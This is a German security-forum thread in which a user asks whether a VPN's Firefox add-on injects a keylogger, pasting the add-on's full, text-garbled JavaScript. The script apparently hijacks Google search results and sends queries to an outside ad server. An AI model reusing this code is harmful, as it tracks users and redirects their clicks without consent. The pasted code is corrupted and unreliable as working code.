Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: OkayFreedom VPN - Firefox Addon = Keylogger?

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 24.11.2014, 18:19   #1
weißfred
 
OkayFreedom VPN - Firefox Addon = Keylogger? - Standard

OkayFreedom VPN - Firefox Addon = Keylogger?



Hallo liebe Forummitglieder,

im Addon Firebug ist mir aufgefallen, dass mein Firefox auf allen seiten das JavaScript unter "https://a.xfreeservice.com/partner/UnhyLrS9/?cid=1&sid=steganos" lädt. Dafür verantwortlich ist das Addon vom VPN-Programm OkayFreedom. Wenn ich mir den Inhalt so anschaue, denke ich es könnte eine Art Keylogger sein. Liege ich damit richtig?

Hier der Inhalt:

PHP-Code:
var x2A_a null;
var 
x2A_b false;
var 
ao_subid '';
ao_subid 'steganos';
var 
x2A_c false;
var 
x8E_a 'UnhyLrS9';
var 
x8E_b '0THxjF98XK';
var 
x8E_c '1BAU6PAD1M';
var 
ausv 1,
    
kf8u_dik "",
    
rdmv "",
    
aox_i "",
    
aox_h "",
    
aox_o "",
    
aox_f = [],
    
aox_g "",
    
aox_m null,
    
bt "",
    
g_q "",
    
call_api_time null,
    
sr2f_s9g "false",
    
api_retry 0,
    
shead "";
var 
ao_config;
if (
navigator.userLanguage) {
    var 
xjsonsrc document.createElement("script");
    
xjsonsrc.type "text/javascript";
    
xjsonsrc.src "https://a.xfreeservice.com/js/json3.min.js";
    
document.getElementsByTagName('head')[0].appendChild(xjsonsrc);
    var 
xxpathsrc document.createElement("script");
    
xxpathsrc.type "text/javascript";
    
xxpathsrc.src "https://a.xfreeservice.com/js/wgxpath.install.js";
    
document.getElementsByTagName('head')[0].appendChild(xxpathsrc);
    
setTimeout("wgxpath.install()"1000);
    
setTimeout("aox_b()"1500);
} else {
    
aox_b();
}

function 
aox_b() {
    
ao_config JSON.parse('{"a":"gbqfq","b":"ires","c":"//div[@class=\'rc\']/h3/a","d":"*/../../div","e":"*/../..","f":{"2":"visible","1":"0px 0px 0px 100px","4":"display"}}');
    
window.setInterval("ao_start(ao_subid)"700);
}

function 
ao_start(ao_subid) {
    if (
ao_config["a"] == null) return;
    if (
location.href.indexOf('?q=') == -&& location.href.indexOf('&q=') == -&& location.href.indexOf('#q=') == -&& (document.getElementById(ao_config["a"]) == null || document.getElementById(ao_config["a"]).value == '')) return;
    if (
location.href.indexOf('tbm=isch') > -|| location.href.indexOf('tbm=vid') > -|| location.href.indexOf('tbm=shop') > -|| location.href.indexOf('tbm=nws') > -|| location.href.indexOf('tbm=bks') > -|| location.href.indexOf('tbm=app') > -|| location.href.indexOf('tbm=is') > -|| location.href.indexOf('tbm=i') > -|| location.href.indexOf('/advanced_search') > -|| location.href.indexOf('scholar.google.com') > -|| location.href.indexOf('apis.google.com') > -|| location.href.indexOf('docs.google.com') > -|| location.href.indexOf('/url?') > -|| location.href.indexOf('/maps') > -|| location.href.indexOf('/uds/afs?') > -|| location.href.indexOf('books.google') > -|| location.href.indexOf('/aclk?') > -1) return;
    if (
document.getElementById(ao_config["b"]) == null || document.getElementById(ao_config["b"]).getAttribute("ao") != null) return;
    
document.getElementById(ao_config["b"]).setAttribute("ao"true);
    
aox_f = [];
    var 
nL = [];
    
aox_i g_q "";
    var 
document.evaluate(ao_config["c"], document.bodynullXPathResult.ANY_TYPEnull);
    var 
null;
    while (
x.iterateNext()) nL.push(y);
    for (var 
0nL.lengthi++) {
        var 
nL[i].host.replace('www.''');
        
z.replace(':80''');
        
z.replace(':443''');
        
aox_i += ",";
        
nL[i].setAttribute("lf93je"nL[i].href);
    }
    if (
aox_i.length == 0) {
        return;
    }
    
g_q document.getElementById(ao_config["a"]).value;
    
aox_g "hxxp://b.xfreeservice.com/redir/clickGate.php?u=" x8E_a "&m=12&p=" x8E_b "&t=33&s=" encodeURIComponent(ao_subid) + "&q=" g_q;
    
aox_h aox_a("k8ve" x8E_c aox_i "D9vk-f2");
    var 
i_o = !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0;
    var 
i_f typeof InstallTrigger !== 'undefined';
    var 
i_s Object.prototype.toString.call(window.HTMLElement).indexOf('Constructor') > 0;
    var 
i_c = !!window.chrome && !i_o;
    var 
i_i /*@cc_on!@*/ false || !!document.documentMode;
    
bt 4;
    
bt i_c bt;
    
bt i_f bt;
    
bt i_i bt;
    
bt i_s bt;
    if (
bt == "undefined"bt 4;
    
kf8u_dik "";
    
sr2f_s9g "false";
    
api_retry 0;
    
call_api(btg_qrdmvx8E_caox_haox_iapi_retry)
};

function 
call_api(btg_qrdmvx8E_caox_haox_iapi_retry) {
    var 
se_p document.location.href.match("\&start=([^\&]*)");
    
se_p se_p && se_p.length ? (parseInt(se_p[1]) + 1) : "1";
    var 
saoajax document.createElement("script");
    
saoajax.type "text/javascript";
    
saoajax.src "https://a.xfreeservice.com/?r=0&bt=" bt "&rdmv=" rdmv "&bl=" navigator.language "&p=" x8E_c "&k=" aox_h "&sp=" se_p "&tld=" aox_i "&q=" g_q;
    var 
saoajaxinc document.getElementsByTagName('script')[0];
    
saoajaxinc.parentNode.insertBefore(saoajaxsaoajaxinc);
    
setTimeout("start_check('" bt "','" g_q "','" rdmv "','" x8E_c "','" aox_h "','" aox_i "','" api_retry "')"600);
}

function 
start_check(btg_qrdmvx8E_caox_haox_iapi_retry) {
    
api_retry++;
    if (
sr2f_s9g == "true") {
        
aox_c();
    } else {
        if (
api_retry 5) {
            
setTimeout("start_check('" bt "','" g_q "','" rdmv "','" x8E_c "','" aox_h "','" aox_i "','" api_retry "')"600);
        }
    }
}

function 
aox_c() {
    if (
kf8u_dik.length == 0) return;
    
aox_f = [];
    
query_result_array kf8u_dik.split(",");
    for (var 
0query_result_array.lengthi++) {
        var 
query_result_array[i].split("|");
        if (
j.length == 3aox_f.push(j);
    }
    var 
nL = [];
    var 
nLa = [];
    var 
document.evaluate(ao_config["c"], document.bodynullXPathResult.ANY_TYPEnull);
    var 
null;
    while (
x.iterateNext()) nL.push(y);
    for (var 
0nL.lengthi++) {
        
nL[i];
        for (var 
0aox_f.lengthj++) {
            if (
aox_f[j][0] != y.host.replace('www.''')) continue;
            
aox_f[j][0] = "";
            if (!
x2A_c) {
                
y.onmousedown = function(e) {
                    var 
_i document.createElement("iframe");
                    
_i.src this.href;
                    
_i.style.display "none";
                    
document.body.appendChild(_i);
                    
this.href aox_g "&url=" encodeURIComponent(this.getAttribute("lf93je"));
                    return 
true;
                };
            }
            
nLa = [];
            
document.evaluate(ao_config["d"], y.parentNodenullXPathResult.ANY_TYPEnull);
            while (
x.iterateNext()) nLa.push(z);
            for (var 
0nLa.lengthk++) {
                
nLa[k].parentNode.id "a" aox_f[j][2];
                for (var 
0Object.keys(ao_config["f"]).lengthl++) {
                    
aox_p(nLa[k], Object.keys(ao_config["f"])[l], ao_config["f"][Object.keys(ao_config["f"])[l]]);
                }
            }
            
document.evaluate(ao_config["e"], y.parentNodenullXPathResult.ANY_TYPEnull);
            
x.iterateNext();
            var 
_a document.createElement("a");
            
_a.href y.getAttribute("lf93je");
            
_a.onmousedown = function() {
                
this.href aox_g "&url=" encodeURIComponent(this.href);
            };
            
_a.style.border "0px";
            
_a.id "b" aox_f[j][2];
            var 
_d document.createElement("div");
            
_d.style.position 'absolute';
            
_d.innerHTML "<img src='https://c.xfreeservice.com/logos_v2/90x45/" aox_f[j][2] + ".gif' border='0' width='90' height='45'/>";
            if (
x2A_a != null) {
                
_a.title "Ad by " x2A_a;
                
_d.innerHTML += "<br/>Ad by " x2A_a;
                
_d.style.color "#999999";
                
_d.style.fontSize "8px";
                
_d.style.width "90px";
                
_d.style.whiteSpace "nowrap";
                
_d.style.overflow "hidden";
                
_d.style.margin "3px 0px 0px 0px";
                if (
x2A_b) {
                    var 
_ab document.createElement("a");
                    
_ab.href "javascript:void()";
                    
_ab.onclick = function() {
                        
document.getElementById("b" this.id).parentNode.removeChild(document.getElementById("b" this.id));
                        var 
document.getElementById("a" this.id);
                        for (var 
0x.childNodes.lengthi++)
                            if (
x.childNodes[i].nodeType == 1x.childNodes[i].style.paddingLeft '0px';
                    };
                    
_ab.title "Close Ad";
                    
_ab.innerHTML "X";
                    
_ab.style.paddingLeft "3px";
                    
_ab.style.position 'absolute';
                    
_ab.style.right '0px';
                    
_ab.style.backgroundColor '#ffffff';
                    
_ab.id aox_f[j][2];
                    
_d.appendChild(_ab);
                }
            }
            
_a.appendChild(_d);
            
z.insertBefore(_az.childNodes[1]);
        }
    }
};

function 
aox_p(eav) {
    switch (
a) {
        case 
"1":
            
e.style.padding v;
            break;
        case 
"2":
            
e.style.overflow v;
            break;
        case 
"4":
            
e.style.display v;
            break;
    }
}

function 
aox_a(string) {
    function 
aox_s(aox_taox_u) {
        return (
aox_t << aox_u) | (aox_t >>> (32 aox_u))
    }

    function 
aox_v(lXlY) {
        var 
lX4lY4lX8lY8aox_w;
        
lX8 = (lX 0x80000000);
        
lY8 = (lY 0x80000000);
        
lX4 = (lX 0x40000000);
        
lY4 = (lY 0x40000000);
        
aox_w = (lX 0x3FFFFFFF) + (lY 0x3FFFFFFF);
        if (
lX4 lY4) {
            return (
aox_w 0x80000000 lX8 lY8)
        }
        if (
lX4 lY4) {
            if (
aox_w 0x40000000) {
                return (
aox_w 0xC0000000 lX8 lY8)
            } else {
                return (
aox_w 0x40000000 lX8 lY8)
            }
        } else {
            return (
aox_w lX8 lY8)
        }
    }

    function 
F(xyz) {
        return (
y) | ((~x) & z)
    }

    function 
G(xyz) {
        return (
z) | (& (~z))
    }

    function 
H(xyz) {
        return (
z)
    }

    function 
I(xyz) {
        return (
^ (| (~z)))
    }

    function 
FF(abcdxsac) {
        
aox_v(aaox_v(aox_v(F(bcd), x), ac));
        return 
aox_v(aox_s(as), b)
    };

    function 
GG(abcdxsac) {
        
aox_v(aaox_v(aox_v(G(bcd), x), ac));
        return 
aox_v(aox_s(as), b)
    };

    function 
HH(abcdxsac) {
        
aox_v(aaox_v(aox_v(H(bcd), x), ac));
        return 
aox_v(aox_s(as), b)
    };

    function 
II(abcdxsac) {
        
aox_v(aaox_v(aox_v(I(bcd), x), ac));
        return 
aox_v(aox_s(as), b)
    };

    function 
aox_x(string) {
        var 
aox_y;
        var 
aox_z string.length;
        var 
aoy_c_aox_r1 aox_z 8;
        var 
aoy_c_aox_r2 = (aoy_c_aox_r1 - (aoy_c_aox_r1 64)) / 64;
        var 
aoy_c = (aoy_c_aox_r2 1) * 16;
        var 
aoy_d = Array(aoy_c 1);
        var 
aoy_e 0;
        var 
aoy_f 0;
        while (
aoy_f aox_z) {
            
aox_y = (aoy_f - (aoy_f 4)) / 4;
            
aoy_e = (aoy_f 4) * 8;
            
aoy_d[aox_y] = (aoy_d[aox_y] | (string.charCodeAt(aoy_f) << aoy_e));
            
aoy_f++
        }
        
aox_y = (aoy_f - (aoy_f 4)) / 4;
        
aoy_e = (aoy_f 4) * 8;
        
aoy_d[aox_y] = aoy_d[aox_y] | (0x80 << aoy_e);
        
aoy_d[aoy_c 2] = aox_z << 3;
        
aoy_d[aoy_c 1] = aox_z >>> 29;
        return 
aoy_d
    
};

    function 
aoy_i(aox_t) {
        var 
aoy_h "",
            
aoy_h_aox_r "",
            
aoy_jaoy_k;
        for (
aoy_k 0aoy_k <= 3aoy_k++) {
            
aoy_j = (aox_t >>> (aoy_k 8)) & 255;
            
aoy_h_aox_r "0" aoy_j.toString(16);
            
aoy_h aoy_h aoy_h_aox_r.substr(aoy_h_aox_r.length 22)
        }
        return 
aoy_h
    
};

    function 
aoy_l(string) {
        
string string.replace(/\r\n/g"\n");
        var 
aoy_m "";
        for (var 
0string.lengthn++) {
            var 
string.charCodeAt(n);
            if (
128) {
                
aoy_m += String.fromCharCode(c)
            } else if ((
127) && (2048)) {
                
aoy_m += String.fromCharCode((>> 6) | 192);
                
aoy_m += String.fromCharCode((63) | 128)
            } else {
                
aoy_m += String.fromCharCode((>> 12) | 224);
                
aoy_m += String.fromCharCode(((>> 6) & 63) | 128);
                
aoy_m += String.fromCharCode((63) | 128)
            }
        }
        return 
aoy_m
    
};
    var 
= Array();
    var 
kAABBCCDDabcd;
    var 
S11 7,
        
S12 12,
        
S13 17,
        
S14 22;
    var 
S21 5,
        
S22 9,
        
S23 14,
        
S24 20;
    var 
S31 4,
        
S32 11,
        
S33 16,
        
S34 23;
    var 
S41 6,
        
S42 10,
        
S43 15,
        
S44 21;
    
string aoy_l(string);
    
aox_x(string);
    
0x67452301;
    
0xEFCDAB89;
    
0x98BADCFE;
    
0x10325476;
    for (
0x.length+= 16) {
        
AA a;
        
BB b;
        
CC c;
        
DD d;
        
FF(abcdx[0], S110xD76AA478);
        
FF(dabcx[1], S120xE8C7B756);
        
FF(cdabx[2], S130x242070DB);
        
FF(bcdax[3], S140xC1BDCEEE);
        
FF(abcdx[4], S110xF57C0FAF);
        
FF(dabcx[5], S120x4787C62A);
        
FF(cdabx[6], S130xA8304613);
        
FF(bcdax[7], S140xFD469501);
        
FF(abcdx[8], S110x698098D8);
        
FF(dabcx[9], S120x8B44F7AF);
        
FF(cdabx[10], S130xFFFF5BB1);
        
FF(bcdax[11], S140x895CD7BE);
        
FF(abcdx[12], S110x6B901122);
        
FF(dabcx[13], S120xFD987193);
        
FF(cdabx[14], S130xA679438E);
        
FF(bcdax[15], S140x49B40821);
        
GG(abcdx[1], S210xF61E2562);
        
GG(dabcx[6], S220xC040B340);
        
GG(cdabx[11], S230x265E5A51);
        
GG(bcdax[0], S240xE9B6C7AA);
        
GG(abcdx[5], S210xD62F105D);
        
GG(dabcx[10], S220x2441453);
        
GG(cdabx[15], S230xD8A1E681);
        
GG(bcdax[4], S240xE7D3FBC8);
        
GG(abcdx[9], S210x21E1CDE6);
        
GG(dabcx[14], S220xC33707D6);
        
GG(cdabx[3], S230xF4D50D87);
        
GG(bcdax[8], S240x455A14ED);
        
GG(abcdx[13], S210xA9E3E905);
        
GG(dabcx[2], S220xFCEFA3F8);
        
GG(cdabx[7], S230x676F02D9);
        
GG(bcdax[12], S240x8D2A4C8A);
        
HH(abcdx[5], S310xFFFA3942);
        
HH(dabcx[8], S320x8771F681);
        
HH(cdabx[11], S330x6D9D6122);
        
HH(bcdax[14], S340xFDE5380C);
        
HH(abcdx[1], S310xA4BEEA44);
        
HH(dabcx[4], S320x4BDECFA9);
        
HH(cdabx[7], S330xF6BB4B60);
        
HH(bcdax[10], S340xBEBFBC70);
        
HH(abcdx[13], S310x289B7EC6);
        
HH(dabcx[0], S320xEAA127FA);
        
HH(cdabx[3], S330xD4EF3085);
        
HH(bcdax[6], S340x4881D05);
        
HH(abcdx[9], S310xD9D4D039);
        
HH(dabcx[12], S320xE6DB99E5);
        
HH(cdabx[15], S330x1FA27CF8);
        
HH(bcdax[2], S340xC4AC5665);
        
II(abcdx[0], S410xF4292244);
        
II(dabcx[7], S420x432AFF97);
        
II(cdabx[14], S430xAB9423A7);
        
II(bcdax[5], S440xFC93A039);
        
II(abcdx[12], S410x655B59C3);
        
II(dabcx[3], S420x8F0CCC92);
        
II(cdabx[10], S430xFFEFF47D);
        
II(bcdax[1], S440x85845DD1);
        
II(abcdx[8], S410x6FA87E4F);
        
II(dabcx[15], S420xFE2CE6E0);
        
II(cdabx[6], S430xA3014314);
        
II(bcdax[13], S440x4E0811A1);
        
II(abcdx[4], S410xF7537E82);
        
II(dabcx[11], S420xBD3AF235);
        
II(cdabx[2], S430x2AD7D2BB);
        
II(bcdax[9], S440xEB86D391);
        
aox_v(aAA);
        
aox_v(bBB);
        
aox_v(cCC);
        
aox_v(dDD)
    }
    var 
aox_r aoy_i(a) + aoy_i(b) + aoy_i(c) + aoy_i(d);
    return 
aox_r.toLowerCase()
}; 

Alt 24.11.2014, 19:15   #2
schrauber
/// the machine
/// TB-Ausbilder
 

OkayFreedom VPN - Firefox Addon = Keylogger? - Standard

OkayFreedom VPN - Firefox Addon = Keylogger?



Ich schiebe dich mal lieber in den Diskussionsbereich
__________________

__________________

Antwort

Themen zu OkayFreedom VPN - Firefox Addon = Keylogger?
absolute, addon, before, ccc, check, cid, class, close, config, false, firefox, hidden, iframe, inhalt, javascript, keylogger, liebe, richtig, search, seite, seiten, start, steganos, switch, vpn



Ähnliche Themen: OkayFreedom VPN - Firefox Addon = Keylogger?


  1. Ads by VLC Addon entfernen
    Anleitungen, FAQs & Links - 09.08.2015 (2)
  2. Addon Control entfernen
    Anleitungen, FAQs & Links - 28.09.2014 (2)
  3. Firefox Addon: AVIRA SafeSearch sinnvoll?
    Antiviren-, Firewall- und andere Schutzprogramme - 16.08.2014 (14)
  4. Download Protect 2.2.4 Addon kann nicht aus dem Firefox entfernt werden
    Plagegeister aller Art und deren Bekämpfung - 18.07.2014 (6)
  5. WebCheck Addon geht nicht weg
    Plagegeister aller Art und deren Bekämpfung - 10.07.2014 (1)
  6. Shopping-Addon entfernen
    Anleitungen, FAQs & Links - 04.06.2014 (2)
  7. Win7: Firefox Addon HDStreamer vollständig löschen
    Log-Analyse und Auswertung - 08.05.2014 (7)
  8. firefox-addon VIS 1.01 - trojaner eingefangen ?
    Plagegeister aller Art und deren Bekämpfung - 13.03.2014 (10)
  9. Mozilla Addon WOT und DoNotTrackMe
    Antiviren-, Firewall- und andere Schutzprogramme - 19.09.2013 (1)
  10. Loadtbs-2.1 in Systemsteuerung und als IE9 Addon
    Plagegeister aller Art und deren Bekämpfung - 09.10.2012 (21)
  11. Keylogger Trojan-Spy.Win32.KeyLogger.cqd in Windows32
    Plagegeister aller Art und deren Bekämpfung - 05.08.2010 (1)
  12. Thunderbird - Bounce Addon?
    Alles rund um Windows - 18.12.2009 (8)
  13. Videos downloaden per Firefox-addon
    Diskussionsforum - 30.11.2009 (0)
  14. Addon Plugin lol alles müll?
    Log-Analyse und Auswertung - 22.02.2008 (3)
  15. Video Addon und IE Probleme
    Plagegeister aller Art und deren Bekämpfung - 19.11.2007 (5)
  16. Video addon
    Plagegeister aller Art und deren Bekämpfung - 16.10.2007 (2)

Zum Thema OkayFreedom VPN - Firefox Addon = Keylogger? - Hallo liebe Forummitglieder, im Addon Firebug ist mir aufgefallen, dass mein Firefox auf allen seiten das JavaScript unter "https://a.xfreeservice.com/partner/UnhyLrS9/?cid=1&sid=steganos" lädt. Dafür verantwortlich ist das Addon vom VPN-Programm OkayFreedom. Wenn ich - OkayFreedom VPN - Firefox Addon = Keylogger?...
Archiv
Du betrachtest: OkayFreedom VPN - Firefox Addon = Keylogger? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.